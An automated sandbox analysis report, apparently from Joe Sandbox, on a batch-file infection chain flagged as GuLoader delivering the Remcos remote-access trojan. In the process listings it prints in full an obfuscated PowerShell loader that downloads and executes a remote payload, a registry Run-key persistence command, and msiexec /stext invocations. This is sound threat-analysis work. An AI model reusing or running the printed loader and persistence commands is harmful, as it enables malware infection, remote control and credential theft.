                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: 65 34 ba a3 90 41 b6 6b bf bc d9 9d 83 6d b5 d2 9c 2a b8 33 02 43 c3 b1 c1 72 20 20 e4 97 50 c6 9e 17 9d a6 77 78 52 1a 47 e5 09 16 8e 7c 1c 35 27 df 67 f0 d2 62 b5 5f 28 bf c4 3d c3 9e 88 f1 37 80 98 01 f7 6f 4a 37 bb d0 c3 b5 44 cf 3b 6b 84 ae b0 59 d0 33 9e 37 98 72 72 cf 3e 9b ae cb 62 e2 06 09 ea c5 52 26 c6 0a b8 c7 ec 2b a4 3d f1 4a 23 5d 57 dd 90 e3 ba 76 2f 84 50 c2 cc 70 50 2a 1b cb e1 67 ce e2 54 67 f5 aa 21 51 e5 ec f9 53 9c d5 68 6a 84 2a 50 fd 43 12 68 f8 3f 2b 98 29 4d 86 12 38 69 48 f2 5e b0 37 ee 66 57 80 e1 9b b6 b7 b3 58 1c e6 e8 0f c6 05 f6 93 0b 5b 8f c3 2b af 08 21 bc 95 a3 36 17 bf 95 25 ca a3 6b dc 16 9b 32 9f ff b7 be 2b c9 42 7e ea 29 6f d1 7c 00 da df 8c 1e 07 aa 4d 89 ee 01 72 38 3d b1 82 41 15 65 40 d3 6b 81 3a f8 6b 84 ca 6f
                                                                                                      Data Ascii: e4Akm*3Cr PwxRG|5'gb_(=7oJ7D;kY37rr>bR&+=J#]Wv/PpP*gTg!QShj*PCh?+)M8iH^7fWX[+!6%k2+B~)o|Mr8=Ae@k:ko
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: 11 a6 da 67 6e 27 d5 5c d2 ea bc ea eb 09 0b 4b ce ad e3 c4 c7 09 97 1f 34 38 76 f7 54 88 36 94 ae 74 09 f2 c2 4c 8d e7 a0 10 f9 fb da 35 8d cf ad 9a b5 08 58 3e 1a 34 0f f5 37 85 05 95 43 bd 9a 96 14 a0 4e 14 8b e2 b3 4e 12 27 13 10 8c 28 99 9e 68 a8 7d 2a 46 38 8b 66 25 b3 6b 2e 92 56 ec c5 dc db af 85 79 f7 91 18 66 60 da 36 a9 9b fc 42 19 07 35 b5 47 c0 f8 25 b2 19 7b 4e 0a b2 0a 9e d0 db 49 2e 4c f9 3a 77 6a d9 66 29 b7 b4 91 93 92 bc a7 39 6d 3e fb d2 a3 d4 9e d5 1f 5b 55 9a a4 85 bf 24 c5 6c c6 87 1d 4e 51 48 85 48 96 53 a6 cc 7b 38 3c 44 b4 42 1b ae 0f 48 c7 30 da 90 18 a0 65 57 62 e8 2e 27 69 4b 82 11 0e 2d d0 fe b0 72 68 a9 19 19 c6 07 eb 15 1a c3 db 5f 81 f2 58 55 ba 0b a5 1b 47 c4 dd cd 8b de 7b e2 b9 5d ea 27 b2 da 36 61 12 bb fd 9f 24 33 c5
                                                                                                      Data Ascii: gn'\K48vT6tL5X>47CNN'(h}*F8f%k.Vyf`6B5G%{NI.L:wjf)9m>[U$lNQHHS{8<DBH0eWb.'iK-rh_XUG{]'6a$3


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:09:02:57
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMGTR657365756.bat" "
                                                                                                      Imagebase:0x7ff7cec30000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:09:02:57
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:09:02:57
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin HjkdpsycsSpivfoffsoF rtrTerrsTortyPocknDemai,yttnthamg rodespu,rSter]Syll=ejer$ Br FobskuExporHon.cHypoa Nont.opieSyn d SedrOverr SneeTo.lfInterT esa.oldg lua FlabInteiPilklTareiAlt.tMis,y ogl ');$Gasartens60=Taborets 'Unfo$.luerFj leHimygSlvleGoallJe,nmaftesCrtosbilli Co gVulcsForlt Mad. TheDA tioKerawUdfrnFodblmi roSemiaYuked ,ycFUndeiBro lA.ioeV ks(Prin$Col ESci.n Klag D,ml eaneEs es DiskStena armrHklee gaarHidss Ace, Chi$ UpbUAcc dAquebBraclDephi fbkAr esRein) ald ';$Udbliks=$Thioneine;Politiseres (Taborets 'Reun$CampgSul.lSpitoCrabbPriva ExflMala:manuaDom,c RaahLus,r ,riOB,thMAntiA.eksT gotiKontNInvii HorcZo t= nc( kh,T ,tyeS leSQuattVa v-GldsPBrazaSkostfilthTran Bee$granUfacsdKokoBAlinl RafIE ickNot sSamm)Su a ');while (!$Achromatinic) {Politiseres (Taborets 'Meak$Kom gKalil ScroRemubYowla PrelGuar:BekrgR warF ise ForiEnd.t geo= Bun$WhamtCaferSolou anese v ') ;Politiseres $Gasartens60;Politiseres (Taborets 'QuivSKom tJohaA eflRDislTS nd-PrehsFoppLBarneQueseM,nipPama Reme4A ha ');Politiseres (Taborets 'Sand$ Ro Gkyp LCopro MatBHjlpA AnrLS dd:SynaAS,ilCResoh Na R L,sORakeMBen ABol t,lipIRe.anFjorI ubCbut,=.nch(En.lTCa.tETohesMel TMacr-DeplPShanAT,glT SnaHReup lu.k$SladuSprrd Samb,ammlMicrIF,enkFlusSRamp) ua ') ;Politiseres (Taborets 'A,sk$MomogDisal E ko DiaB BerANontL nge:agriiSkiemRethpCh llTi.beTur MFibrE MorNRegnTMuceaSadltKolliChroo AsyNEa lAmnstLLode= Sna$ VelGUndelDr tOBoonbIngeAIroklLy o:Snorn edtoP ckT Ga a TeltS.orE Afvs Ras+ dup+ cho%Fire$S arS KarARouttek ke rctLNo slKrybIAltsT,itabSardYeftee Af rIdeoNBjrne arpsTolv.OpsaCPi tOTok.USkamnIrreTPant ') ;$Engleskarers=$Satellitbyernes[$implementational];}$Budgettets=309680;$minification=29934;Politiseres (Taborets 'P el$ vergStuelChaeoMolabChr a utuLUsag:Semim ngeMilikP raA Sl N Ba IUnprK ritk SlueD gerBeclnK,ivEUngrsPa k Mou=Fed GratGMisoE udat Rus-ophtcUf eO ReanBaskTFilteVaquNHaentSved A fr$a rjuSa vdAtrib edeLEmbrIDummKBellS iva ');Politiseres (Taborets 'Togp$AfgigSt,klL kroF eebBillaDis l Not: erpAPodorAksecTrish uffaTypoe Bu oBa,dlPhen Afre= ska Re.u[Ba oSLgkuyindlsflurtSproeIntrmTr,n.TresCLegaoNifenMacuv etueSeksrIrontOutr]San :With:KonsFAirprResboTa km SciBRetraSpeasTy keim o6 Rst4ValuSAfsttNglerAdeliApnenNon g unk(Stre$U stmStane.rfakCerva ilbnSelviP aekSk ak ozee,cotrCentn BeveAftosSign) F.l ');Politiseres (Taborets ',ome$Zulkg T,klBi eoFdevBNds aUndeLFors:Dic.mP,edODe oR InctWedgAn,tuLombyWImpeIPredSUnfaE Re 1 Sub3Bilt3Anac sy b=Kloe Yeg [Pries AttyYellSBilltPhipeCarlm rat. ndeTS ane StaxHuskTProd.H,neESkulNPernCskaloCh iDExcrIS.mlnBeg.G.tje]Disl:perf:SyriA TenS eucc AriiPrgtiSpkh.Spu.GVa aeCabrT,iscs Am tNo pREv kIIschNP upg Fli( Fle$CeleAR.mor DiecDiplH othAUndeECa lOAndeLTele)A ch ');Politiseres (Taborets ',und$ KargJordl vaboEnsuBCahoaLastl Ima:HospCKd jOTracM Ch pSteaUIndet T,nEStalreg.sdmodvrSkifESiniV VokEUnimt Fol=A va$ ,enm T rO nscRSeksTNotiA stalF,stWDiptIFinhsAp ke ov1R od3U ha3 ies.BoetsMercuFinebP tasAndet KarR Lb ISk,dnUndeGKloe(Infr$ Fo b ProuleftdsmakGOvereB sttIdxlt N re ra,t Sn SA,fo,Cher$G,unmPhleI ovenBy liEl kFPr.fiUr gC.pacAScrutSoldi TiloThinNAfte)Fo r ');Politiseres $computerdrevet;"
                                                                                                      Imagebase:0x7ff7be880000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2234266355.000001DCBFB5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:09:02:57
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:5
                                                                                                      Start time:09:03:13
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin HjkdpsycsSpivfoffsoF rtrTerrsTortyPocknDemai,yttnthamg rodespu,rSter]Syll=ejer$ Br FobskuExporHon.cHypoa Nont.opieSyn d SedrOverr SneeTo.lfInterT esa.oldg lua FlabInteiPilklTareiAlt.tMis,y ogl ');$Gasartens60=Taborets 'Unfo$.luerFj leHimygSlvleGoallJe,nmaftesCrtosbilli Co gVulcsForlt Mad. TheDA tioKerawUdfrnFodblmi roSemiaYuked ,ycFUndeiBro lA.ioeV ks(Prin$Col ESci.n Klag D,ml eaneEs es DiskStena armrHklee gaarHidss Ace, Chi$ UpbUAcc dAquebBraclDephi fbkAr esRein) ald ';$Udbliks=$Thioneine;Politiseres (Taborets 'Reun$CampgSul.lSpitoCrabbPriva ExflMala:manuaDom,c RaahLus,r ,riOB,thMAntiA.eksT gotiKontNInvii HorcZo t= nc( kh,T ,tyeS leSQuattVa v-GldsPBrazaSkostfilthTran Bee$granUfacsdKokoBAlinl RafIE ickNot sSamm)Su a ');while (!$Achromatinic) {Politiseres (Taborets 'Meak$Kom gKalil ScroRemubYowla PrelGuar:BekrgR warF ise ForiEnd.t geo= Bun$WhamtCaferSolou anese v ') ;Politiseres $Gasartens60;Politiseres (Taborets 'QuivSKom tJohaA eflRDislTS nd-PrehsFoppLBarneQueseM,nipPama Reme4A ha ');Politiseres (Taborets 'Sand$ Ro Gkyp LCopro MatBHjlpA AnrLS dd:SynaAS,ilCResoh Na R L,sORakeMBen ABol t,lipIRe.anFjorI ubCbut,=.nch(En.lTCa.tETohesMel TMacr-DeplPShanAT,glT SnaHReup lu.k$SladuSprrd Samb,ammlMicrIF,enkFlusSRamp) ua ') ;Politiseres (Taborets 'A,sk$MomogDisal E ko DiaB BerANontL nge:agriiSkiemRethpCh llTi.beTur MFibrE MorNRegnTMuceaSadltKolliChroo AsyNEa lAmnstLLode= Sna$ VelGUndelDr tOBoonbIngeAIroklLy o:Snorn edtoP ckT Ga a TeltS.orE Afvs Ras+ dup+ cho%Fire$S arS KarARouttek ke rctLNo slKrybIAltsT,itabSardYeftee Af rIdeoNBjrne arpsTolv.OpsaCPi tOTok.USkamnIrreTPant ') ;$Engleskarers=$Satellitbyernes[$implementational];}$Budgettets=309680;$minification=29934;Politiseres (Taborets 'P el$ vergStuelChaeoMolabChr a utuLUsag:Semim ngeMilikP raA Sl N Ba IUnprK ritk SlueD gerBeclnK,ivEUngrsPa k Mou=Fed GratGMisoE udat Rus-ophtcUf eO ReanBaskTFilteVaquNHaentSved A fr$a rjuSa vdAtrib edeLEmbrIDummKBellS iva ');Politiseres (Taborets 'Togp$AfgigSt,klL kroF eebBillaDis l Not: erpAPodorAksecTrish uffaTypoe Bu oBa,dlPhen Afre= ska Re.u[Ba oSLgkuyindlsflurtSproeIntrmTr,n.TresCLegaoNifenMacuv etueSeksrIrontOutr]San :With:KonsFAirprResboTa km SciBRetraSpeasTy keim o6 Rst4ValuSAfsttNglerAdeliApnenNon g unk(Stre$U stmStane.rfakCerva ilbnSelviP aekSk ak ozee,cotrCentn BeveAftosSign) F.l ');Politiseres (Taborets ',ome$Zulkg T,klBi eoFdevBNds aUndeLFors:Dic.mP,edODe oR InctWedgAn,tuLombyWImpeIPredSUnfaE Re 1 Sub3Bilt3Anac sy b=Kloe Yeg [Pries AttyYellSBilltPhipeCarlm rat. ndeTS ane StaxHuskTProd.H,neESkulNPernCskaloCh iDExcrIS.mlnBeg.G.tje]Disl:perf:SyriA TenS eucc AriiPrgtiSpkh.Spu.GVa aeCabrT,iscs Am tNo pREv kIIschNP upg Fli( Fle$CeleAR.mor DiecDiplH othAUndeECa lOAndeLTele)A ch ');Politiseres (Taborets ',und$ KargJordl vaboEnsuBCahoaLastl Ima:HospCKd jOTracM Ch pSteaUIndet T,nEStalreg.sdmodvrSkifESiniV VokEUnimt Fol=A va$ ,enm T rO nscRSeksTNotiA stalF,stWDiptIFinhsAp ke ov1R od3U ha3 ies.BoetsMercuFinebP tasAndet KarR Lb ISk,dnUndeGKloe(Infr$ Fo b ProuleftdsmakGOvereB sttIdxlt N re ra,t Sn SA,fo,Cher$G,unmPhleI ovenBy liEl kFPr.fiUr gC.pacAScrutSoldi TiloThinNAfte)Fo r ');Politiseres $computerdrevet;"
                                                                                                      Imagebase:0x270000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2380669297.0000000008A80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2381021661.0000000009E8F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:6
                                                                                                      Start time:09:03:13
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:09:03:28
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x1f0000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4525154442.000000002253E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4525112746.00000000224FD000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:9
                                                                                                      Start time:09:03:32
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
                                                                                                      Imagebase:0x790000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:10
                                                                                                      Start time:09:03:32
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:11
                                                                                                      Start time:09:03:33
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
                                                                                                      Imagebase:0xc10000
                                                                                                      File size:59'392 bytes
                                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:14
                                                                                                      Start time:09:03:49
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws"
                                                                                                      Imagebase:0x1f0000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:15
                                                                                                      Start time:09:03:49
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\avqzpodslp"
                                                                                                      Imagebase:0x1f0000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:16
                                                                                                      Start time:09:03:49
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
                                                                                                      Imagebase:0x1f0000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
